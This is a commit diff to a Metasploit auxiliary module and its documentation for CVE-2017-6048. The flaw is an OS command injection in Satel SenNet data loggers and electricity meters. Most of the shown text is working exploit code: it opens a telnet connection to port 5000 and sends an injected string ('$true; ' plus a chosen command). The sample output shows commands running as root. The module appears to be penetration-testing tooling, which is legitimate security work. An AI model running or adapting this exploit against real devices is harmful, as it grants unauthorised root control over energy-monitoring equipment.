Updated module and doc

Author: juushya

documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md

@@ -1,4 +1,9 @@
-This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.
+This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
+
+The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
+1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
+2. SenNet Solar Datalogger V5.03-1.56a and prior, and
+3. SenNet Multitask Meter V5.21a-1.18b and prior.
 
 ## Verification Steps
 
@@ -16,7 +21,7 @@ msf auxiliary(satel_cmd_exec) > run
 
 [*] 1.3.3.7:5000   - Sending command now - id;
 [+] 1.3.3.7:5000   - uid=0(root) gid=0(root)
-[+] 1.3.3.7:5000   - File saved in: /root/.msf4/loot/20000000000004_1.3.3.7_cmdexeclog_528409.txt
+[+] 1.3.3.7:5000   - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 

modules/auxiliary/scanner/telnet/satel_cmd_exec.rb

@@ -3,19 +3,24 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Telnet
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
     super(update_info(info,
-      'Name' => 'Satel SenNet Data Logger Privileged Shell Arbitrary Command Execution Vulnerability',
+      'Name' => 'Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability',
       'Description' => %q{
-        This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.
+        This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters
+        to perform arbitrary command execution as 'root'.
       },
+      'References'     =>
+        [
+          [ 'CVE', '2017-6048' ],
+          [ 'URL', 'https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-131-02' ]
+        ],
       'Author' =>
         [
           'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
@@ -29,45 +34,25 @@ def initialize(info = {})
       [
         Opt::RPORT(5000),
         OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),
-        OptString.new('CMD', [true, 'Command(s) to run', 'id; pwd;'])
+        OptString.new('CMD', [true, 'Command(s) to run', 'id'])
       ], self.class
     )
 
     deregister_options('USERNAME', 'PASSWORD')
   end
 
-  def report_cred(opts)
-    service_data = {
-      address: opts[:ip],
-      port: opts[:port],
-      service_name: opts[:service_name],
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
-
-    login_data = {
-      last_attempted_at: Time.now,
-      core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
-      proof: opts[:proof]
-    }.merge(service_data)
-
-    create_credential_login(login_data)
-  end
-
   def run_host(ip)
     to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
     begin
       ::Timeout.timeout(to) do
         command = datastore['CMD']
-        inject = '$true; ' + "#{command}"
+        inject = "$true; #{command}"
         res = connect
 
         print_status("Sending command now - #{command}")
 
         sock.puts(inject)
-        data = sock.get_once(-1, 5)
-
+        data = sock.get_once(-1, to)
         print_good("#{data}")
 
         loot_name = 'cmd-exec-log'
@@ -77,7 +62,7 @@ def run_host(ip)
         print_good("File saved in: #{p}")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{rhost}:#{rport} - Connection Failed...")
       return false
     ensure
       disconnect